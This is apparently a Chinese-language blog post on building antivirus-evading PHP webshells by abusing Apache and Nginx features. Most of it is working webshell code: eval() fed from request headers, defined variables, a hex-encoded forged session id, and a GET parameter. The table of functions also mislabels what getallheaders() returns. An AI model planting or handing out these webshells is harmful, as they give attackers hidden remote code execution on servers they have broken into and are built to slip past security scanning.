PHP利用Apache、Nginx的特性实现免杀Webshell

get_defined_vars()getallheaders()是两个特性函数,我们可以通过这两个函数来构造我们的webshell。 

环境 函数 用法
nginx get_defined_vars() 返回由所有已定义变量所组成的数组
apache getallheaders() 返回由所有已定义变量所组成的数组

apache环境

<?php
eval(next(getallheaders())); 
?>

apache和nginx环境通用

<?php
eval(implode(reset(get_defined_vars())));
?>

另外一种通过执行伪造的sessionid值,进行任意代码执行。

<?php
eval(hex2bin(session_id(session_start())));
?>

706870696e666f28293b这个是phpinfo();的hex编码。

给shell加密码

<?php eval(get_defined_vars()['_GET']['cmd']);?>
平安喜乐,如愿以偿

NGINX编译安装及主机配置分离

上一篇

web容器上传文件利用方式总结

下一篇

你也可能喜欢

发表评论

您的电子邮件地址不会被公开。 必填项已用 * 标注

提示:点击验证后方可评论!

插入图片

我们相爱了!

    lovelovelove

    一起走过686 天

标签云

分类目录

PHP利用Apache、Nginx的特性实现免杀Webshell

长按储存图像,分享给朋友

微信扫一扫

微信扫一扫